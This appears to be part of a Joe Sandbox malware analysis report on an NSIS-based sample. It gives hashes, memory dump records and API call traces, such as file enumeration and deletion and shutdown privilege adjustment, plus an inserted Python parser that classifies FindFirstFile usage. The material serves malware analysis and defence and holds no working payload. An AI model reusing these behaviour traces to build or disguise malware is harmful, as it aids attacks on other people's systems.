                                                                                                            • Opcode ID: 860324745a0e0adc055c87cab5708bc96185accb5101a0ef2f44faea38e072e1
                                                                                                            • Instruction ID: d78005b8e44d5efde10ccb2bf6b86ada17c5db4df88182a57970eff9a54ed90c
                                                                                                            • Opcode Fuzzy Hash: 860324745a0e0adc055c87cab5708bc96185accb5101a0ef2f44faea38e072e1
                                                                                                            • Instruction Fuzzy Hash: BFC08033309710975E35E76DF8405CE57958EC9212714CD3FF045C75445D50AD4B41C5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b575510537275747390df6de444fb820969cde146a6ce71027acbbda274a48d
                                                                                                            • Instruction ID: f4b2855b815a4d40e17489798b74c7388adbda1e24d92b207045e203ec9121bc
                                                                                                            • Opcode Fuzzy Hash: 4b575510537275747390df6de444fb820969cde146a6ce71027acbbda274a48d
                                                                                                            • Instruction Fuzzy Hash: 9FD0227080420CDFC704DFA0E809BA9B37CEB03303F0000ACA81823210CBB00D00C788
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c26d75b2c9e004be6eaa7002b7b5271a6d8ba475b55e5218995b95ebb4ca2d0f
                                                                                                            • Instruction ID: 69fb3cc54c07aca209800393dbc2669614e77377777ba01a044722f210f85451
                                                                                                            • Opcode Fuzzy Hash: c26d75b2c9e004be6eaa7002b7b5271a6d8ba475b55e5218995b95ebb4ca2d0f
                                                                                                            • Instruction Fuzzy Hash: 59C01274442E098BE6082B60AC0CB39B2A8BB07303FC82910A008128308BB854148648
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4b044d4315e19b9f9ec5f561de0fd4feba925d6df306caa4388c250683a6acb
                                                                                                            • Instruction ID: f4118c15f671343d51795081cd575ec5c00f853918ec0ca862e658bef72e36de
                                                                                                            • Opcode Fuzzy Hash: d4b044d4315e19b9f9ec5f561de0fd4feba925d6df306caa4388c250683a6acb
                                                                                                            • Instruction Fuzzy Hash: D2C08C30278304CFE200AB5DC884A0133ACFF89B08F2058E0F0158BA61CB22FC004A05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab41a2740e7bc486d67e1cde8daaaa86ead2778cdb98eb262cd3103ff891a407
                                                                                                            • Instruction ID: 64c0fa35aefa8860aebbe9247bb20ec449cfc69d7330e4377586bfffce43f68a
                                                                                                            • Opcode Fuzzy Hash: ab41a2740e7bc486d67e1cde8daaaa86ead2778cdb98eb262cd3103ff891a407
                                                                                                            • Instruction Fuzzy Hash: 28C012300083088BD505E7A1DC96555332B67801007C0D510A2055666BEFB469E64B96
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78a1f5d72b3bc7bcae80da2010768bc5dff8b9bf171ae00c8a24816d6cb94727
                                                                                                            • Instruction ID: 35382793d18856e569077b7bd074a3fc80c5e114d674d7ea614cc416c62d6094
                                                                                                            • Opcode Fuzzy Hash: 78a1f5d72b3bc7bcae80da2010768bc5dff8b9bf171ae00c8a24816d6cb94727
                                                                                                            • Instruction Fuzzy Hash: A5C08C3E204103D78A0FC710849092BFB529BD5282F28C81DB49011224CA258C2289A1
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,76F92EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
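The two "APIs" lists above show how much a function's behaviour can be read off the call list alone: the function around ref 00405B23 calls DeleteFileW, appends "\*.*" to a buffer with lstrcatW, then hands that same buffer (00425730) to FindFirstFileW and loops with FindNextFileW before FindClose, which is the shape of a directory-enumerate-and-delete routine; the function at ref 00406736 calls FindFirstFileW and immediately FindClose with no FindNextFileW, the usual "does this path exist" probe. The following parser is an added example written for this page, not code from Joe Sandbox or from the sample; it parses API lines in the format the report prints, correlates the lstrcatW target buffer with the FindFirstFileW search-spec argument, and applies the two heuristics just described. The category names and the assumption that the first arguments printed are the real parameters are the example's own; the two sample inputs are copied from the records above.

```python
"""Parse Joe Sandbox-style "APIs" lines and classify FindFirstFile usage.

Added example for this report page; not Joe Sandbox code. Input lines are
copied from the two function records above; the labels below are heuristics
chosen for this example, not report terminology.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One line: "• FindFirstFileW.KERNEL32(arg,arg,...), ref: 00405BA4"
API_LINE = re.compile(
    r"^•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]   # as printed; leading entries are the call's parameters
    ref: int          # address of the call instruction


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return the parsed calls in code order (sorted by ref address)."""
    calls: list[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


def call_order(calls: list[ApiCall]) -> list[str]:
    """API names in address order, i.e. the static layout of the function."""
    return [c.api for c in calls]


def wildcard_search_spec(calls: list[ApiCall]) -> str | None:
    """Buffer that lstrcatW extended with '\\*.*' and FindFirstFileW then
    searched with, or None if the two calls are not linked that way.
    Assumes args[0] of lstrcatW and FindFirstFileW are the real first params."""
    wild = {c.args[0] for c in calls
            if c.api == "lstrcatW" and len(c.args) > 1 and c.args[1] == r"\*.*"}
    for c in calls:
        if c.api == "FindFirstFileW" and c.args and c.args[0] in wild:
            return c.args[0]
    return None


def classify(calls: list[ApiCall]) -> str:
    """Heuristic label for how the function uses the FindFirstFile family."""
    names = set(call_order(calls))
    if "FindFirstFileW" not in names or "FindClose" not in names:
        return "other"
    if "FindNextFileW" in names:
        # enumeration loop; with DeleteFileW present it reads as a recursive
        # delete helper (delete attempt first, then walk the directory)
        return "directory_enumerate_and_delete" if "DeleteFileW" in names else "directory_enumerate"
    # FindFirstFileW + FindClose and nothing in between: existence probe
    return "path_exists_check"


# Sample input copied from the report records above.
RECORD_405B23 = r"""
• DeleteFileW.KERNEL32(?,?,00437800,76F92EE0,00000000), ref: 00405B23
• lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B6B
• lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B8E
• lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B94
• FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405BA4
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
• FindClose.KERNEL32(00000000), ref: 00405C53
"""

RECORD_406736 = r"""
• FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00406736
• FindClose.KERNEL32(00000000), ref: 00406742
"""

if __name__ == "__main__":
    for name, text in (("405B23", RECORD_405B23), ("406736", RECORD_406736)):
        calls = parse_api_lines(text)
        print(name, classify(calls), wildcard_search_spec(calls), call_order(calls))
```

Run on the two records, the first is labelled directory_enumerate_and_delete with search buffer 00425730 and the second path_exists_check with no wildcard buffer. The ordering by ref address is what makes the DeleteFileW-before-enumeration layout visible; the "Similarity" API ID strings in the report are an alphabetised summary and lose that order.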
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: D
                                                                                                            • API String ID: 0-2746444292
                                                                                                            • Opcode ID: 5b73389e57a4b6f10820555485e19a1a6c66189bc0adb15f369c3bd1bfbe2cd4
                                                                                                            • Instruction ID: 02f9e8e457ee530a3400fdc972bc1bc55d197bfb58df35d134f071b615c39050
                                                                                                            • Opcode Fuzzy Hash: 5b73389e57a4b6f10820555485e19a1a6c66189bc0adb15f369c3bd1bfbe2cd4
                                                                                                            • Instruction Fuzzy Hash: 8EB1CD74E00358CFDB54DFA4C994BADBBB2AF49300F6081A9D819AB351DB35AE81CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 358c2e299f0cc3fa87130c364767876f2ebb43ee0ea42f9e701386b2aeb62912
                                                                                                            • Instruction ID: 55ca2ff09ee5f9e4875febb8e846ec2a3614b0d84fe9c8fb62c73ff45a396def
                                                                                                            • Opcode Fuzzy Hash: 358c2e299f0cc3fa87130c364767876f2ebb43ee0ea42f9e701386b2aeb62912
                                                                                                            • Instruction Fuzzy Hash: 5D529C74E01228CFDB64DF65C984B9DBBB2BB89301F5081EAE409A7355DB35AE81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b0aa878f0b73eb2a9fdd43bbea325435f1d7300f4299ec4360b73fba23d535b
                                                                                                            • Instruction ID: 7a32e976ed71d30973443c4f9ebab9ad8cf025e623ef36df4449645eb2b0b8fe
                                                                                                            • Opcode Fuzzy Hash: 0b0aa878f0b73eb2a9fdd43bbea325435f1d7300f4299ec4360b73fba23d535b
                                                                                                            • Instruction Fuzzy Hash: 01D1D174E00218CFDB54DFA9C994BADBBB2AF89300F5080A9D419AB355DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 400f13c2c91b484ca2770e292b3d2519d330662bb96d2e788ba19f30e598fd65
                                                                                                            • Instruction ID: d3b4a6d9cfec2e99e7006e1bf5e722b3f17d9bf08d90cd673e62c276cb4bab84
                                                                                                            • Opcode Fuzzy Hash: 400f13c2c91b484ca2770e292b3d2519d330662bb96d2e788ba19f30e598fd65
                                                                                                            • Instruction Fuzzy Hash: 9FD1E274E00318CFDB54DFA9C994B9DBBB2AF89300F5080A9D819AB355DB359E81CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 672bf20af3226ae7ef91fef304f3138c99d7792f84d7f6793bece0648591fa8e
                                                                                                            • Instruction ID: e4e99190fc42c00ad17794857fc9611af2a3c4cd435dfb8248f70410af8f8dfd
                                                                                                            • Opcode Fuzzy Hash: 672bf20af3226ae7ef91fef304f3138c99d7792f84d7f6793bece0648591fa8e
                                                                                                            • Instruction Fuzzy Hash: 73C1D074E00318CFEB54DFA5C994BADBBB2AF89300F5080A9D419AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e0ce74520a5f55e09a46f8d31e58cd0a817362a05c0627381458371064bd8dd5
                                                                                                            • Instruction ID: 0aa1813f091ca0ed2e674b2b1da61593e6a3218d877aedf73a022c0d142ec3e4
                                                                                                            • Opcode Fuzzy Hash: e0ce74520a5f55e09a46f8d31e58cd0a817362a05c0627381458371064bd8dd5
